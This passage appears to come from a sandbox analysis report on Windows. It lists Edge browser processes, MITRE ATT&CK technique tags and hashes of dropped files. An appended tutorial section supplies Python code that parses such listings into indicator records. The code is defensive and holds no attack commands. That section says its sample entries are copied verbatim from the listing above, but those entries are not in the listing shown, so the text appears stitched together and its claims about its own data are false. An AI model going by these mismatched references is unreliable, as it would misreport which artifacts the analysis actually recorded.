      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2232,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:13
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3, PID 4632)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=3552,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:2
    - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe (depth 3, PID 1776)
      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4368,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:14
    - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe (depth 3, PID 384)
      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4368,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:14
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3, PID 4608)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4576,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:14
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3, PID 5476)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4692,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=4660 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3, PID 4892)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4648,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=4624 /prefetch:14
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3, PID 2776)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4532,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=5056 /prefetch:14
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3, PID 4232)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=5420,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=5452 /prefetch:1
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe (depth 1, PID 1512)
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
- C:\Windows\system32\cmd.exe (depth 1, PID 4596)
  C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 1416)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe (depth 1, PID 4876)
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
Network
MITRE ATT&CK Enterprise v16
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Deobfuscate/Decode Files or Information (1)
- Hide Artifacts (1)
  - Hidden Files and Directories (1)
- Modify Registry (1)
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\ff852b6c-4618-4c26-97b0-e82ca5000671\index-dir\the-real-index
Filesize72B
MD5515e3ae0380e02ae883db2d90101f64c
SHA195a60953e08f8da11902ed949382fee9cbc775cf
SHA2565d393f52e82740030f6e6deff189a30454aff5e22be5c63406ca0ed46a2887d3
SHA512ecaa7f21af5ae7ad70e848d5aa13cb8f21da6189dbf70d7d1c8c6a643c8bb72620d604f1f8b6649720ae160cefd121befa15f077195b536efd95c760a1fcd556
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\ff852b6c-4618-4c26-97b0-e82ca5000671\index-dir\the-real-index~RFe5c0e11.TMP
Filesize48B
MD58fb1cfced5c4757a1bdabfe0afa37aa2
SHA163ac9a886fbbb271aa1bf748dfba8d683b7b1db6
SHA2561d0fa9fd5a74b9aae950ebaa968b83d3d399849823993dc7bff6e47c4935acd8
SHA5128601adccbc84a8112c8499f2d24c6be88c64059817f25fdb069d4a1032aacb3f93f0fc9d7ca9f321e2f4cf4cc0a7aff6d90168ac7f5082dfabd3cf048a009ae9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
Filesize327B
MD536b1322129ea1b4419763f7f1d76b4fa
SHA1d788c9fa3b8aa03bb335f9e8c47966be82e4068d
SHA25688a87edff9238998818b1668f01022a69310733aa6677aefff7b983d71a75901
SHA512bc4b2ebccf6e7ceea7f3511558471eb6d7f2e04d0c13dc5d9500f1b482fde17903f148316f2288ebc7f9097408da116629cc3d0062cc7282e55ded72bad73c51
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
Filesize322B
MD57bc7a4f01ba596b555d3acca2ff448f1
SHA1d46d1bc3bade039abecd0f499852ec2dc66b5f3f
SHA2562bf4563e2e5b8ba41c0015076e8fd67a892735e43a96a7ff88a7c87b39d15d5f
SHA5127eccf18eb682ee25c6b91512b11a907dd142f3e5ef34cd2aeb4090d7c1ea358009108ed47c315a666e2c853c18b01654557112b94d7a188ec091fd763516031f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize72B
MD590f8ae97f491a8729273948fa2db02c5
SHA12e711fbb5dd017cb5222d308c5c4d291e22038cf
SHA2565f0f093bafa33b078c1038c6154af801e333e0aa862ffee64caad76b79f9990e
SHA512b6776cce4093114da65b4ded571b3921776c73492ed95c958ded2124165dc220683804bf51df6978befac52f10787d48435778b0aacefbd83decfa6b7de45d08
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5c0de2.TMP
Filesize72B
MD50d74ed4340422fb1769a17fcbb4e9460
SHA1970f8818b3d77e9b4963a07a74d18d17da1960ad
SHA2562ee5b6dcf0bbe2e07ed81d84ef7ede11906d7375423369257e69d3af336d8216
SHA512cb9e2374514a3515821f2f12883ed21baad59bb7ed8479fa0157631fec3aac58e5e0396bf54131cf123ae01f54214c7d62634834cfde6715979616511bc483bc
-
Filesize
326B
MD578ea317200d1fd4b45fbce60412b7d15
SHA119e4ae2fc791f8a2386cf266c99947cd8aa87b09
SHA2564b75be9b08cf82228c7b09ce25d803fdc439f8d612ee5b6fb7ccdc2fd9236753
SHA51218f42d92b16fc76bdade5cc1192176f9cf6918bc9d9d6269a50b89abe6aefc2894a398ba70f02f7280d443f4074fe75ab0c9bf83ff12205c485685ac8d917798
-
Filesize
22KB
MD52c04530baa5cbf4da7568583cfcba840
SHA1568ffa48ba2d0a03d9fcd0da5f9359fcd2d22c6c
SHA256a7ab8675c37f8e44fb81c90d932affd955826acbd555c3e9833ce60106d3c2ca
SHA5124651e75dec129a3373c0c145aedc9157813bce50f93884d18a73ad2a882f4e26f9ccce7fd16001ba530932591822c05cebf4bcf2ed8076361a3becb45e482fdb
-
Filesize
13B
MD53e45022839c8def44fd96e24f29a9f4b
SHA1c798352b5a0860f8edfd5c1589cf6e5842c5c226
SHA25601a3e5d854762d8fdd01b235ce536fde31bf9a6be0596c295e3cea9aaf40f3dd
SHA5122888982860091421f89f3d7444cacccb1938ef70fc084d3028d8a29021e6e1d83eaef62108eace2f0d590ed41ece0e443d8b564e9c9a860fc48d766edb1dc3d9
-
Filesize
40KB
MD53224f2a32a86168c7d7c6e5579837337
SHA1242c6d22c34eabcf9473ae4857f953df3a7a4ee5
SHA256387cfa75e4bf16f5a8909491d327eab95bda1345df83e1fbdb2010a57d69e523
SHA512c2e695cf1167aac41b45381a6dcd70501b6c8bd5e6d7b6354f77100825a19075aec0398838628c5476b93bc7340a40162a8780e05882c0f1531349c2b44bbec9
-
Filesize
55KB
MD5dae724dece99b424f833db98b400c721
SHA1e5d034e3d31b37f816f1b1ae5792ff183b02ae51
SHA2569241235c2f46e440a91cea2f877aa7fc75bd689cd338b40e15361482c0432186
SHA512f3efe8abfea22ff258f9d610b7aaca62e98eae73a380d0fbb1959f48908ac89afe197085d645ff43244e781c92f534d4c36a69ffb52e6ad1370890ab2c24fd57
-
Filesize
55KB
MD5f8eacbdfc82e910b743f7e9c25cd194c
SHA16c31e8f385d989120972e6e652b99622dfefa5ac
SHA25615b71ca1817b83d49823bccb26fb0107161315a962dfb53d7a6044d6d10b2be4
SHA512c28f8c44535739eaa1d8a85435d678ac9ff6972b9466886019b0b6a7a445f54c2e429d61cf933d75a760fd154b07966478ba96bf3c6e80db86ccfe5cb093f1c6
-
Filesize
39KB
MD59175139d56a42d7ec0779065aa9d6756
SHA1bb6ddd7c6406477619743e1fcc8d48c8f04d9d26
SHA256313552106a565d5a3c8f260e6a82ccde2606ebe464351520bfdd6cbe7ffbdfa7
SHA512443c934adf5e7d88a4ac10e834e94b5e86233e3ba606da10d287bb9b5c7cdf0a99aba6e3e17ec803a70e66434466fd7c510fa06a765443bd0b7e8fc308a53718
-
Filesize
86B
MD5961e3604f228b0d10541ebf921500c86
SHA16e00570d9f78d9cfebe67d4da5efe546543949a7
SHA256f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed
SHA512535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472
-
Filesize
1KB
MD53ec725b51b7dc5a5315cba7c430bcdab
SHA1fea1075c521710c02a66613aa052df5bb2425f52
SHA256af3a1b94c4e6bf79ae14e27a9486837169fcfafa04d8cae03b9330771ef3b7fb
SHA5129f7c1da86d663f3cb4309706a754f3d516f49e6a7dcef664a9712af75f7546355945b564ef4815c2f2b3d27a4121b88813bfe5a8910d10de8c192b2830462115
-
Filesize
64B
MD57fce898bbf7d2713eeb746f44fe7a289
SHA1bbb88596ebc97ddb3c83a1e0238c23110ae53586
SHA2560404d189236865e4d43a47c354d44c5ede1c10f4c3357d428f4af47cf9655839
SHA51284cd1e360e266b1ef6400c756c2035f011f9927f205fc250b758257fab9c710e7f19a288c2812eece27fa1d650d27f45617f6d8cb9cb53778c8fedca608ec4d0
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
1KB
MD5da255d6e827f6f566661652c5f08620e
SHA127a36eb35d67c0ef70bf71d5be1a989641808d65
SHA256a3b85d0066eeb4d7f0ce0c48eacbb922d6b48fd108c611f7cd05835fc0acc956
SHA5127aa629b4929885cf5c42bc1d280083dbd31ccac6425f6757cfce07dbbe4ad33a85fff1d4f8907505dc13f710d4308ee06d1fbc77e365b6b0392c8328b2fc99d0
-
Filesize
1KB
MD53f40d651f2dcf866a02a27bd227ca4ee
SHA1a9e6a4b46d40bd28e18e093a89a8d44b3df321d7
SHA2566977cb39ce8bbebd2cee5cbbb4a55aef8f424f5d7b3e461b7ecfea5c285b0a84
SHA51215809990ad18189c8283ce573312efb7269a464e88697e4c2f0f140d322bca0a9ee5d83dc62c6b1effe72c031682f76835029080caa6d9cf775a70e84009c57f
-
Filesize
64B
MD5c7f3909baaf041fe87d52e79e8a93275
SHA16ba2b9e2f4617a770a3de5f10520bd6d376845fa
SHA256ed4b0405042568c69fea8059e85ca1955f411d5e5f5c54918a796173ac0b8d9c
SHA5125c9c58e401423685d887056bcd474c45d95897b32831e57ccaf27256860533b1c47cd557657af90e2d64a67b754cd65a10dbce400de43222851995a303e37400
-
Filesize
1KB
MD57355f4a1d4e1a2519a4a60ee11f1d192
SHA18802bbb71f3e8947c02a7d835b31c7abf4289780
SHA2562fac16b31607552d8f35d56232cb768ddc2f393c6162d243482466527005f4e3
SHA5127186100f86bc7a161667583daa5419d3b75acf620892610e0fab26866a4a300795a270bb5009b7af115216569c0d854fe1e3a68121af6f734fc16f7bfaed2d33
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize23KB
MD50ccc31c7e5303f7c764aed3b6bfc2497
SHA14871f2de6d55f15e2b033e44d04feb35e285c5d4
SHA25645b4a9490690a0ebca87c7293583b8ff16c61a36659c1831372476370b24280b
SHA512bbfddbc6d3543789db4ad1240b9a03e14cb3c2934b3decdf4bb77ccab66849340a31d3a11373d4f73aecefc42f4e016961f40d7bef3cc7ca34fb740b3bcbe143
-
Filesize
4KB
MD5af2025c41ef1bf77c565cec9d2171608
SHA14dd689ad03543c85bc22ab0a4134c3fa65779af1
SHA2566c709c40aba28cb272e1ad7289a6b7eeefe7e3f471cce7ea7b48a0707cba6186
SHA5127dd1fbaa04a58e0ff69ad363408c313b54a383e761317f031dd764002b6fb9a84981b98506b2b87f1ce120123c8dcc2b1b994f6e23dba83324855a09e3393637
-
Filesize
5KB
MD56be01d3cb84e03bc55ee35ed0647c09a
SHA13d45c143f1850727a5d11d1a8b5c206523fcc024
SHA2564799f8aa917927dde4a26f3f434d4a57994dc30c78cc3511fac1cbab6bd24dc9
SHA512c689ec735acdd91512f892c966e541e3bc5e713f7e2d7e7bf29d8450576a93a1b00b0dfbe0bf26217a6151e6e0f457da164d0c50e4874d5a0372a0b61a1623c9
-
Filesize
4KB
MD5cf17b717a1f6b30084a58fde8614f021
SHA176a9e97828f57e7e605e3eba02691a8a629ba10d
SHA256298894785378ab2dbf591529c029c499e1f42692a6fc36075586e6f6bf6e3c8a
SHA5124d9a49e6d886513aa85ee9e08850c7bb170c969cbf50365670b24ff7f2ec646e876cd211da9bdd36cc785439174e757270a75ab4704b568814b17a3f6c246f69
-
Filesize
2KB
MD5592ea555e801f38b1bf67cb9d991ab15
SHA1d47540e67bf8e1e47053007f0bff43e056039c1a
SHA25638f929deeaa986df14301e9de15bed8fe14343fa0d20612adb7f92b5149e44c5
SHA512ed9e0ab76c5a988d467825eb4dc8481622fc19c9a1ebffadae06290f7c9f81e281b54ec1f9500aedff81e6da0f1b6d852f720da1d43712b2c661b54db3b729a7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9.2MB
MD524a2cfa58d0c6106dc8f85ce4d4cb1b0
SHA18a2073974e98d3fe7b179a674d7d42a003fb900d
SHA256d433e44ca87ba06b144f0a21647d3a931ab1774b98a07f26fbba9db4a4a1b677
SHA51228f176c37ff890ca3c0923e09704ebf9cf57f47e434d823d3561c33bc0bf0dc8156ad3313d730741fe0578b60d7d02f31285ade6200517d6e160fd5ddf679e4d
-
Filesize
1KB
MD5b3a0d83a607e0697d64086284634c9b7
SHA10673e875f9eb177a4a632e07789c51f8e0c8539f
SHA2569c623463a89b0b442a02e11204459705546ff5afe71e311bd5f93769147fe9c6
SHA512224284c1beca5e94b27c8bade4301655a3157daa6c1ecb27b283d88d92392a782b3a73682a785965d7eb3a878b0b42de2253aff2998fe786f8f062080bdf88aa
-
Filesize
1KB
MD51527cfd97339d0e1e3b843709258f923
SHA1bd70b4a9a0907ec88f45746ff7bc8fa215600363
SHA25606d1135878d9c3a4da436ddc968d55e823913b8ab41c129bf0e1edc9fc9a4e2b
SHA512bf43006b742f479adc7589396a92ba6b91e75e46a204eb5e9f3ba6b8e4c1579fc27c7b7122571d7da32e9b502964901a1a72892ce864cb4c20bb7646999d92fd
-
Filesize
1KB
MD5ca5ba42cbefc26effb53197e55603e60
SHA1401330944f8badbaac54652daa6fc7a7db709c06
SHA256f64137173f4550a8c313f2c517f0a837d3d9d78c1f795b6ef424348c9e64b5e4
SHA5124104f9163f6a554e695045134dac8c7e1c5fa2a3d826f8a2328f19cb9d96adc66ebbc781fa75208ad2ecb78210cc899733e031ab8bd374dc9cb9c0fee2ddbb9b
-
Filesize
1KB
MD5d328a72be4f254bf67829056007503ae
SHA17042a9c537e872abefd74824720b96c65b126924
SHA25624d901496fb88dfd94354ae23f24a9e6c800f6a18ff1ef32bb1fb624d3f48c5e
SHA512c327615654fd8bb97bbd686fbe6798c3a3c6d9e4700041a42a76d84cadb0d4f81d8c4d75c0104b95f3b4a8b8c509e311745948bf10e803740121a0a90cb3d53f
-
Filesize
1KB
MD5264bb5058d987149b63e09ebe270bc43
SHA1ba3fc8229d4ee7e63f7f26a1b2097bcc5f25acdb
SHA25612e83603339d5294b3a9bcd5e9eeb3ec7d9697d17082d7f904af80ed7863b0cc
SHA5127a70f416eac405108f017dbb5376e88d37a64098ff238cb1ef5ee0b0a718b8fc5c3c974856d4456c0c26164cf572b87f6ed976b2c26948a64dfb9a3a9c40b575
-
Filesize
1KB
MD5bd678c893fd2b9c4c04a3fcb93d47466
SHA1515b63621c1eefb6b62f5d41eb0da7ac515c3b24
SHA256de578000563feecc8bf65e6252d1a5079bdd5487eb9330c85e4443fbfd93a70b
SHA51206906bf0b8443139255e42e6bad0f1523ed3dce7d79041e9c1b3f55e5a180be95ae50cd19a80076f9d96844aad9fd43269a7037ebcc68b0a06a9c5e077bb4ee8
-
Filesize
1KB
MD57a621bb8da8e6388852169f15de7867e
SHA1782983a937218dce41fac2f54acae9f81a8ee0ab
SHA256f2c107e77982085bcf38b033129e4ed4d70cb97a0b19b63e2f0f0d57369bc4e0
SHA512bcee26e35a97037a8de4a8c185a18096ee21596f85ee6686c5ee36d8eba6a51b80d5c24372a999110c839ad63091854b7b06d1abba01224e9277ba4d96670878
-
Filesize
1KB
MD5c4d340ad70fd85b7838ab6a5e6db7cbd
SHA1366646e8f8f698c6b2131aea049e9cfec0e13541
SHA2563372944f6e70bfa8c647c3cbdeac2769fad78b4c2f7d4a1ff3d68d7236ec6dac
SHA512e13e154b5638ead736d68babd95223eef6d43f8c84be771dcf83dc176d79469496c3a6e1fd35fc0aa31472665e60953c13d8706452f07208e8e633112a689bd7
-
Filesize
1KB
MD5755fe8a38b8bf7908445e1a4c4d406a1
SHA15ae56cd73e0181d0b0b28b4a698e07d491a7ccd5
SHA256930bde7920ebac05aa8e2a0a23fa1a8fd683502386fb1e17c1fab7c7435374f9
SHA51229737a7b9952ef4437d18242cb267ec5c6291e92ecad4853fb43907f9191f2213663a454ca25dac422751fada995a82be98d518a13294c58d6946b82bcd2decc
-
Filesize
744KB
MD516659ae52ce03889ad19db1f5710c6aa
SHA166b814fe3be64229e2cc19f0a4460e123ba74971
SHA2560b1866b627d8078d296e7d39583c9f856117be79c1d226b8c9378fe075369118
SHA512f9dd360c3a230131c08c4d5f838457f690ed4094ec166acd9f141b7603f649cfa71a47ea80e9ff41b8296246bdc1c72a75288f9a836c18431e06c2e8e3fc8398
-
Filesize
376KB
MD540da2696cc3adcf1c73aa068f5a953f3
SHA1cdfdb2f99d5c5af339af8ebc84c5dec05e5a3ac9
SHA256c71957fc06a9c8569d9d6769a5e5c8a0a2ca0f27a6c5906a8e27898eabbe8ea4
SHA5126240007efc2436ebad1a5e8de494b566c64959dd89c973bf26f97b64e2be8e1d083e3835d80c68571ac3410bdb9d65cac540047e3f0c84afa263bfd0465f1cc9
-
Filesize
239KB
MD5d678be482106e9cb0d1df0baf98292e3
SHA1c897f7eca06a38fb3a8cb0f05d6ad8f16f9438e2
SHA25672a700cd72f7662220e6154f00fe8c4194bb83e3556b490550dd746cebb02891
SHA512f25e4855df1241245c8f5de1aa6372395508269da83a71c44f24a85e78e57b53f5b2d196526f9d868d42deaf9882a986056e901d91702dea64bfc09148e2415c
-
Filesize
5KB
MD5ef7d6ce54f271156986cadcdae2c5eb1
SHA1b680bf212b98e41dc30d84007e65ff1f090cf293
SHA256ae67293a910698f118364e718806dc2be86085c68c3ee814579b20bd0e26c927
SHA512193e1d6a26d38607bdd13ef2821274cbe48a8fbf5067ea4f93ff66b791b87576dfea294ccc8dd1b85ea5c349ae08f749724606714690d5c45811dcc39c68f764
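The dropped-file listing above is what a responder actually has to work with: one line per field, separators of a lone "-", labels sometimes glued to their values ("Filesize23B", "MD5<hex>") and sometimes split over two lines ("Filesize" / "2B"), and many entries with no path at all. The following Python is an added example, not part of the sandbox report, that parses that layout into records, validates that each digest has the right length for its algorithm, converts the human-readable size to bytes, and checks whether a tiny dropped file matches a candidate content by recomputing all four digests. The two sample entries are copied verbatim from the listing above; the candidate contents (an empty file, "{}", "[]") are constructed guesses for what a 2-byte browser-storage file typically holds, and a match is reported only when every digest the record carries agrees.

```python
import hashlib
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: two entries copied from the dropped-file listing above,
# in the same flattened layout the sandbox page uses.
SAMPLE_LISTING = r"""
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\MANIFEST-000001
Filesize23B
MD53fd11ff447c1ee23538dc4d9724427a3
SHA11335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA51210a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
"""

# Longest labels first so "SHA512..." is never read as "SHA1" + "512...".
LABEL_RE = re.compile(r"^(Filesize|SHA512|SHA256|SHA1|MD5)\s*(.*)$")
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASHERS = {"MD5": hashlib.md5, "SHA1": hashlib.sha1,
           "SHA256": hashlib.sha256, "SHA512": hashlib.sha512}
UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}


@dataclass
class DroppedFile:
    path: Optional[str] = None          # absent for entries the report lists without a path
    size: Optional[str] = None          # as printed, e.g. "23B", "9.2MB"
    digests: Dict[str, str] = field(default_factory=dict)
    problems: List[str] = field(default_factory=list)

    def is_empty(self) -> bool:
        return self.path is None and self.size is None and not self.digests


def parse_listing(text: str) -> List[DroppedFile]:
    """Parse the flattened sandbox listing into one DroppedFile per '-' separated entry."""
    lines = [ln.strip() for ln in text.splitlines()]
    records: List[DroppedFile] = []
    cur = DroppedFile()
    i = 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if not line:
            continue
        if line == "-":                      # entry separator
            if not cur.is_empty():
                records.append(cur)
            cur = DroppedFile()
            continue
        m = LABEL_RE.match(line)
        if not m:
            # The first free-text line of an entry is its path; anything else is noise.
            if cur.is_empty():
                cur.path = line
            else:
                cur.problems.append(f"unexpected line: {line!r}")
            continue
        label, value = m.group(1), m.group(2).strip()
        if not value and i < len(lines):      # split form: value sits on the next line
            value = lines[i]
            i += 1
        if label == "Filesize":
            cur.size = value
        else:
            value = value.lower()
            cur.digests[label] = value
            if not re.fullmatch(r"[0-9a-f]{%d}" % DIGEST_LEN[label], value):
                cur.problems.append(f"{label} digest has wrong length or charset")
    if not cur.is_empty():
        records.append(cur)
    return records


def size_to_bytes(size: str) -> Optional[int]:
    """'23B' -> 23, '9.2MB' -> 9646899; None if the size string is not understood."""
    m = re.fullmatch(r"([0-9]+(?:\.[0-9]+)?)\s*([KMG]?B)", size.strip())
    if not m:
        return None
    return int(float(m.group(1)) * UNITS[m.group(2)])


def identify_content(rec: DroppedFile, candidates: List[bytes]) -> Optional[bytes]:
    """Return the candidate whose recomputed digests equal every digest the record has."""
    if not rec.digests:
        return None
    for data in candidates:
        if all(HASHERS[name](data).hexdigest() == hexd for name, hexd in rec.digests.items()):
            return data
    return None


if __name__ == "__main__":
    guesses = [b"", b"{}", b"[]"]            # constructed candidates for tiny files
    for rec in parse_listing(SAMPLE_LISTING):
        known = identify_content(rec, guesses)
        print(rec.path or "<no path>", rec.size, size_to_bytes(rec.size or ""),
              rec.digests.get("SHA256"), "content=%r" % known, rec.problems)
```

Feed the whole listing to `parse_listing` and you get records you can export as IoCs or diff against a clean baseline; entries whose `problems` list is non-empty were damaged in extraction and should not be trusted as hashes. The content check is only worth running on very small files, where a handful of guesses covers the space; for larger artifacts the SHA-256 goes straight to your threat-intel lookup.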